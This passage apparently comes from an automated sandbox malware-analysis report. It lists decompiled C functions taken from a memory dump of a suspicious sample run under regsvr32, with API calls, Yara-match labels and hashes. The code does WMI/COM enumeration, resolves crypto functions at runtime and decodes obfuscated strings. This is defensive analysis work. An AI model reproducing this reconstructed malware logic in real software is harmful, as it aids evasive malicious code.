                                                                                                                                                                                              							_v8 = _t39[3];
                                                                                                                                                                                              							while(E042AA0A3(_t22,  *_t31) != 0) {
                                                                                                                                                                                              								_t26 = _a8 + 1;
                                                                                                                                                                                              								_t31 = _v8 + 4;
                                                                                                                                                                                              								_a8 = _t26;
                                                                                                                                                                                              								_t22 = _v12;
                                                                                                                                                                                              								_v8 = _v8 + 4;
                                                                                                                                                                                              								if(_t26 < _t39[2]) {
                                                                                                                                                                                              									continue;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              								}
                                                                                                                                                                                              								goto L8;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							 *_t36 =  *_t36 |  *_t39;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						L8:
                                                                                                                                                                                              						_t39 =  &(_t39[4]);
                                                                                                                                                                                              						_t28 = _t28 - 1;
                                                                                                                                                                                              					} while (_t28 != 0);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				Sleep(0xa);
                                                                                                                                                                                              				return 1;
                                                                                                                                                                                              			}










                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNELBASE(0000000A), ref: 042ADAD6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                              • Opcode ID: a42db222107af0d1f7303c4df309c30879ef34fa976a089811e64c1e91cb69c3
                                                                                                                                                                                              • Instruction ID: b4789fa434229c6c78302a1451d78a239c4d07b5ae31c07d7e4d5aa924f59694
                                                                                                                                                                                              • Opcode Fuzzy Hash: a42db222107af0d1f7303c4df309c30879ef34fa976a089811e64c1e91cb69c3
                                                                                                                                                                                              • Instruction Fuzzy Hash: A5115B31B24206AFEB10CF99D584A99B7E9FF88324F148869EC5ADB701D370FA50CB40
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E042AEA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                              				signed int _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				signed int _v60;
                                                                                                                                                                                              				char* _v72;
                                                                                                                                                                                              				signed short _v80;
                                                                                                                                                                                              				signed int _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				char _v96;
                                                                                                                                                                                              				intOrPtr _v100;
                                                                                                                                                                                              				char _v104;
                                                                                                                                                                                              				char _v616;
                                                                                                                                                                                              				intOrPtr* _t159;
                                                                                                                                                                                              				char _t165;
                                                                                                                                                                                              				signed int _t166;
                                                                                                                                                                                              				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E042AE400(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E042A8BDE(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E042A8BF4( &_v60, 0xfffffffe);
					E042AE4B4( &_v104);
					return _t320;
				}
				_t165 = E042A9DF2(_t255, 0x3a7);
				 *_t328 = 0xae7;
				_v52 = _t165;
				_t166 = E042A9DF2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E042A9A5A(_t165);
				_v60 = _t322;
				E042A8BAF( &_v52);
				E042A8BAF( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E042A9DF2(_t255, 0x886);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E042A8BAF( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E042A8BF4( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E042A98BD(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E042A98BD(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E042A8C72(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E042A8BDE( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E042A8BF4(_t136, 0);
								E042A8BF4( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
                                                                                                                                                                                              								__imp__#25(_v24, _t209,  &_v44);
                                                                                                                                                                                              								__eflags = _t209;
                                                                                                                                                                                              								if(_t209 < 0) {
                                                                                                                                                                                              									break;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t212 = E042A98BD(_v44);
                                                                                                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                                                                                                                                                                              								_t213 = _v28;
                                                                                                                                                                                              								_t281 =  *_t213;
                                                                                                                                                                                              								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                                                                                                                                                                              								__eflags = _t214;
                                                                                                                                                                                              								if(_t214 < 0) {
                                                                                                                                                                                              									L39:
                                                                                                                                                                                              									__imp__#6(_v44);
                                                                                                                                                                                              									_t207 = _v12 + 1;
                                                                                                                                                                                              									__eflags = _t207;
                                                                                                                                                                                              									continue;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_v92 = E042A9DF2(_t281, 0xb28);
                                                                                                                                                                                              								 *_t329 = 0x83f;
                                                                                                                                                                                              								_t217 = E042A9DF2(_t281);
                                                                                                                                                                                              								_t283 = _v80;
                                                                                                                                                                                              								_v96 = _t217;
                                                                                                                                                                                              								_t218 = _t283 & 0x0000ffff;
                                                                                                                                                                                              								__eflags = _t218 - 0xb;
                                                                                                                                                                                              								if(__eflags > 0) {
                                                                                                                                                                                              									_t219 = _t218 - 0x10;
                                                                                                                                                                                              									__eflags = _t219;
                                                                                                                                                                                              									if(_t219 == 0) {
                                                                                                                                                                                              										L35:
                                                                                                                                                                                              										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E042A8BDE(0x18);
                                                                                                                                                                                              										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                              										__eflags = _t289;
                                                                                                                                                                                              										if(_t289 == 0) {
                                                                                                                                                                                              											L38:
                                                                                                                                                                                              											E042A8BAF( &_v92);
                                                                                                                                                                                              											E042A8BAF( &_v96);
                                                                                                                                                                                              											__imp__#9( &_v80);
                                                                                                                                                                                              											goto L39;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_push(_v72);
                                                                                                                                                                                              										_push(L"%d");
                                                                                                                                                                                              										L37:
                                                                                                                                                                                              										_push(0xc);
                                                                                                                                                                                              										_push(_t289);
                                                                                                                                                                                              										E042A9E51();
                                                                                                                                                                                              										_t329 = _t329 + 0x10;
                                                                                                                                                                                              										goto L38;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t230 = _t219 - 1;
                                                                                                                                                                                              									__eflags = _t230;
                                                                                                                                                                                              									if(_t230 == 0) {
                                                                                                                                                                                              										L33:
                                                                                                                                                                                              										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E042A8BDE(0x18);
                                                                                                                                                                                              										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                              										__eflags = _t289;
                                                                                                                                                                                              										if(_t289 == 0) {
                                                                                                                                                                                              											goto L38;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_push(_v72);
                                                                                                                                                                                              										_push(L"%u");
                                                                                                                                                                                              										goto L37;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t235 = _t230 - 1;
                                                                                                                                                                                              									__eflags = _t235;
                                                                                                                                                                                              									if(_t235 == 0) {
                                                                                                                                                                                              										goto L33;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags = _t235 == 1;
                                                                                                                                                                                              									if(_t235 == 1) {
                                                                                                                                                                                              										goto L33;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									L28:
                                                                                                                                                                                              									__eflags = _t283 & 0x00002000;
                                                                                                                                                                                              									if((_t283 & 0x00002000) == 0) {
                                                                                                                                                                                              										_v88 = E042A9DF2(_t283, 0xe0a);
                                                                                                                                                                                              										E042A9E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                                                                                                                                                                              										E042A8BAF( &_v88);
                                                                                                                                                                                              										_t329 = _t329 + 0x18;
                                                                                                                                                                                              										_t298 =  &_v616;
                                                                                                                                                                                              										L31:
                                                                                                                                                                                              										_t242 = E042A98BD(_t298);
                                                                                                                                                                                              										L32:
                                                                                                                                                                                              										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                                                                                                                                                                              										goto L38;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t242 = E042AE92E( &_v80);
                                                                                                                                                                                              									goto L32;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                                                              									__eflags = _v72 - 0xffff;
                                                                                                                                                                                              									_t298 = L"TRUE";
                                                                                                                                                                                              									if(_v72 != 0xffff) {
                                                                                                                                                                                              										_t298 = L"FALSE";
                                                                                                                                                                                              									}
                                                                                                                                                                                              									goto L31;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t243 = _t218 - 1;
                                                                                                                                                                                              								__eflags = _t243;
                                                                                                                                                                                              								if(_t243 == 0) {
                                                                                                                                                                                              									goto L38;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t244 = _t243 - 1;
                                                                                                                                                                                              								__eflags = _t244;
                                                                                                                                                                                              								if(_t244 == 0) {
                                                                                                                                                                                              									goto L35;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t245 = _t244 - 1;
                                                                                                                                                                                              								__eflags = _t245;
                                                                                                                                                                                              								if(_t245 == 0) {
                                                                                                                                                                                              									goto L35;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								__eflags = _t245 != 5;
                                                                                                                                                                                              								if(_t245 != 5) {
                                                                                                                                                                                              									goto L28;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t298 = _v72;
                                                                                                                                                                                              								goto L31;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__imp__#16(_v24);
                                                                                                                                                                                              							_t210 = _v28;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                                                                                                                                                                              							_t252 = _v20;
                                                                                                                                                                                              							L42:
                                                                                                                                                                                              							_t262 = _v32;
                                                                                                                                                                                              							_t252 = _t252 + 1;
                                                                                                                                                                                              							_v20 = _t252;
                                                                                                                                                                                              							__eflags = _t262;
                                                                                                                                                                                              							if(_t262 != 0) {
                                                                                                                                                                                              								continue;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							L48:
                                                                                                                                                                                              							_t324 = _v40;
                                                                                                                                                                                              							goto L49;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t247 = _v28;
                                                                                                                                                                                              						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                                                                                                                                                                              						goto L42;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t262 = _v32;
                                                                                                                                                                                              					goto L48;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					E042A8BF4( &_v36, _t322);
                                                                                                                                                                                              					_t320 = _v36;
                                                                                                                                                                                              					goto L53;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}
                                                                                                                                                                                              0x042aed96
                                                                                                                                                                                              0x042aed9a
                                                                                                                                                                                              0x042aed9c
                                                                                                                                                                                              0x042aedb3
                                                                                                                                                                                              0x042aedb7
                                                                                                                                                                                              0x042aedc0
                                                                                                                                                                                              0x042aedcb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aedcb
                                                                                                                                                                                              0x042aeda2
                                                                                                                                                                                              0x042aeda3
                                                                                                                                                                                              0x042aeda8
                                                                                                                                                                                              0x042aeda8
                                                                                                                                                                                              0x042aedaa
                                                                                                                                                                                              0x042aedab
                                                                                                                                                                                              0x042aedb0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aedb0
                                                                                                                                                                                              0x042aeccc
                                                                                                                                                                                              0x042aeccc
                                                                                                                                                                                              0x042aeccf
                                                                                                                                                                                              0x042aed3a
                                                                                                                                                                                              0x042aed4e
                                                                                                                                                                                              0x042aed5e
                                                                                                                                                                                              0x042aed62
                                                                                                                                                                                              0x042aed64
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aed6a
                                                                                                                                                                                              0x042aed6b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aed6b
                                                                                                                                                                                              0x042aecd1
                                                                                                                                                                                              0x042aecd1
                                                                                                                                                                                              0x042aecd4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aecd6
                                                                                                                                                                                              0x042aecd9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aecdb
                                                                                                                                                                                              0x042aecdb
                                                                                                                                                                                              0x042aece1
                                                                                                                                                                                              0x042aecfd
                                                                                                                                                                                              0x042aed0c
                                                                                                                                                                                              0x042aed15
                                                                                                                                                                                              0x042aed1a
                                                                                                                                                                                              0x042aed1d
                                                                                                                                                                                              0x042aed23
                                                                                                                                                                                              0x042aed23
                                                                                                                                                                                              0x042aed28
                                                                                                                                                                                              0x042aed34
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aed34
                                                                                                                                                                                              0x042aece6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aece6
                                                                                                                                                                                              0x042aec89
                                                                                                                                                                                              0x042aecb0
                                                                                                                                                                                              0x042aecb5
                                                                                                                                                                                              0x042aecba
                                                                                                                                                                                              0x042aecbc
                                                                                                                                                                                              0x042aecbc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aecba
                                                                                                                                                                                              0x042aec8b
                                                                                                                                                                                              0x042aec8b
                                                                                                                                                                                              0x042aec8e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aec94
                                                                                                                                                                                              0x042aec94
                                                                                                                                                                                              0x042aec97
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aec9d
                                                                                                                                                                                              0x042aec9d
                                                                                                                                                                                              0x042aeca0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aeca6
                                                                                                                                                                                              0x042aeca9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aecab
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aecab
                                                                                                                                                                                              0x042aeded
                                                                                                                                                                                              0x042aedf3
                                                                                                                                                                                              0x042aedf9
                                                                                                                                                                                              0x042aedfc
                                                                                                                                                                                              0x042aedff
                                                                                                                                                                                              0x042aedff
                                                                                                                                                                                              0x042aee02
                                                                                                                                                                                              0x042aee03
                                                                                                                                                                                              0x042aee06
                                                                                                                                                                                              0x042aee08
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aee58
                                                                                                                                                                                              0x042aee58
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aee58
                                                                                                                                                                                              0x042aeb8f
                                                                                                                                                                                              0x042aeb95
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aeb95
                                                                                                                                                                                              0x042aee55
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aead8
                                                                                                                                                                                              0x042aeadd
                                                                                                                                                                                              0x042aeae2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aeae6

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042AE400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE413
                                                                                                                                                                                                • Part of subcall function 042AE400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE424
                                                                                                                                                                                                • Part of subcall function 042AE400: CoCreateInstance.OLE32(042BC868,00000000,00000001,042BC878,?,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE43B
                                                                                                                                                                                                • Part of subcall function 042AE400: SysAllocString.OLEAUT32(00000000), ref: 042AE446
                                                                                                                                                                                                • Part of subcall function 042AE400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE471
                                                                                                                                                                                                • Part of subcall function 042A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,042A959D,00000100,?,042A6507), ref: 042A8BEC
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 042AEAF3
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 042AEB07
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 042AEE90
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 042AEE99
                                                                                                                                                                                                • Part of subcall function 042A8BF4: HeapFree.KERNEL32(00000000,00000000), ref: 042A8C3A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                                              • String ID: FALSE$TRUE
                                                                                                                                                                                              • API String ID: 1290676130-1412513891
                                                                                                                                                                                              • Opcode ID: a82828c462a1328f9f3bbfa3fc1e54fcfcca1cba6eaa0fb661c127a9384bf3c3
                                                                                                                                                                                              • Instruction ID: c79a52c0bc1da5286b6a38cfbf081f9e817da03b835d83188ff1fd251d1c574b
                                                                                                                                                                                              • Opcode Fuzzy Hash: a82828c462a1328f9f3bbfa3fc1e54fcfcca1cba6eaa0fb661c127a9384bf3c3
                                                                                                                                                                                              • Instruction Fuzzy Hash: E9E17DB1F10219AFDB14EFA8C984AEEBBB9FF08304F104459E905E7240DB71B956CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E042B28F0(intOrPtr* _a4) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				_Unknown_base(*)()* _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				_Unknown_base(*)()* _t15;
                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                              				intOrPtr* _t25;
                                                                                                                                                                                              				intOrPtr* _t29;
                                                                                                                                                                                              				struct HINSTANCE__* _t30;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_t30 = GetModuleHandleW(L"advapi32.dll");
                                                                                                                                                                                              				if(_t30 == 0) {
                                                                                                                                                                                              					L7:
                                                                                                                                                                                              					return 1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
                                                                                                                                                                                              				if(_t25 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t15 = GetProcAddress(_t30, "CryptGenRandom");
                                                                                                                                                                                              				_v12 = _t15;
                                                                                                                                                                                              				if(_t15 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
                                                                                                                                                                                              				if(_t29 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_push(0xf0000000);
                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push( &_v8);
                                                                                                                                                                                              				if( *_t25() == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t20 = _v12(_v8, 4,  &_v16);
                                                                                                                                                                                              				 *_t29(_v8, 0);
                                                                                                                                                                                              				if(_t20 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				 *_a4 = E042B284B( &_v16);
                                                                                                                                                                                              				return 0;
                                                                                                                                                                                              			}












                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,042A7B6A), ref: 042B2902
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 042B291A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 042B2928
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 042B2937
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                              • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                              • API String ID: 667068680-129414566
                                                                                                                                                                                              • Opcode ID: d515c3e0222855632e8568af29d3529983bb32a5c409a725b5a76f9ccd45e5e6
                                                                                                                                                                                              • Instruction ID: 4bd46bfffc0958b676d976bfc90f0222157fc60933c4a6de5cce02c70f69d65a
                                                                                                                                                                                              • Opcode Fuzzy Hash: d515c3e0222855632e8568af29d3529983bb32a5c409a725b5a76f9ccd45e5e6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 15118672F60B07B7EB1196A49C49FDEB7AC9F457D0F2500A1E684F6140DA70FA418AF8
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E042AF7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                              				int _v32;
                                                                                                                                                                                              				signed int _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				int _v68;
                                                                                                                                                                                              				void* _v72;
                                                                                                                                                                                              				intOrPtr _v92;
                                                                                                                                                                                              				int _v96;
                                                                                                                                                                                              				void* _v100;
                                                                                                                                                                                              				intOrPtr _v104;
                                                                                                                                                                                              				intOrPtr _v108;
                                                                                                                                                                                              				char* _v112;
                                                                                                                                                                                              				char _v116;
                                                                                                                                                                                              				char _v132;
                                                                                                                                                                                              				void _v388;
                                                                                                                                                                                              				void _v644;
                                                                                                                                                                                              				intOrPtr _t94;
                                                                                                                                                                                              				intOrPtr _t102;
                                                                                                                                                                                              				signed int _t104;
                                                                                                                                                                                              				intOrPtr* _t105;
                                                                                                                                                                                              				intOrPtr _t110;
                                                                                                                                                                                              				signed int _t111;
                                                                                                                                                                                              				signed int _t112;
                                                                                                                                                                                              				intOrPtr _t115;
                                                                                                                                                                                              				signed int _t116;
                                                                                                                                                                                              				char _t117;
                                                                                                                                                                                              				intOrPtr _t119;
                                                                                                                                                                                              				char _t122;
                                                                                                                                                                                              				intOrPtr _t127;
                                                                                                                                                                                              				signed int _t129;
                                                                                                                                                                                              				intOrPtr _t135;
                                                                                                                                                                                              				intOrPtr _t139;
                                                                                                                                                                                              				intOrPtr _t143;
                                                                                                                                                                                              				intOrPtr _t145;
                                                                                                                                                                                              				intOrPtr _t147;
                                                                                                                                                                                              				intOrPtr _t153;
                                                                                                                                                                                              				intOrPtr _t155;
                                                                                                                                                                                              				intOrPtr _t159;
                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                              				signed int _t165;
                                                                                                                                                                                              				intOrPtr _t179;
                                                                                                                                                                                              				signed int _t186;
                                                                                                                                                                                              				char _t188;
                                                                                                                                                                                              				signed int _t189;
                                                                                                                                                                                              				void* _t190;
                                                                                                                                                                                              				char _t193;
                                                                                                                                                                                              				signed int _t194;
                                                                                                                                                                                              				signed int _t195;
                                                                                                                                                                                              				void* _t196;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v24 = 4;
                                                                                                                                                                                              				_v32 = 0;
                                                                                                                                                                                              				_v28 = 1;
                                                                                                                                                                                              				_t190 = __edx;
                                                                                                                                                                                              				memset( &_v388, 0, 0x100);
                                                                                                                                                                                              				memset( &_v644, 0, 0x100);
                                                                                                                                                                                              				_v56 = E042A9DD8(0xd62);
                                                                                                                                                                                              				_v52 = E042A9DD8(0x8e9);
                                                                                                                                                                                              				_v48 = E042A9DD8(0xa93);
                                                                                                                                                                                              				_v44 = E042A9DD8(0x9a9);
